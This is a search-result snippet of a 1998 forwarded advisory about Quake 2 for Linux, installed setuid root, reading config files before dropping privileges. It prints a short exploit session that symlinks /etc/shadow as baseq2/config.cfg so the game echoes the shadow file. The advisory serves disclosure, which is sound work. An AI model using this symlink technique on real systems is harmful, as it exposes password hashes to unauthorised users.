Displaying 1 result from an estimated 1 matches for "baseq2".
Did you mean:
base2
1998 Feb 25
0
Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files [Forwarded e-mail from kevingeo@CRUZIO.COM]
...who followed the installation instructions and made Quake2 setuid
root.
Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn''t check the permissions before hand.
nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
- -rws--x--x 1 root root 303444 Feb 24 19:07
/usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn''t exec default.cfg
execing config.cfg
Unknown command "r...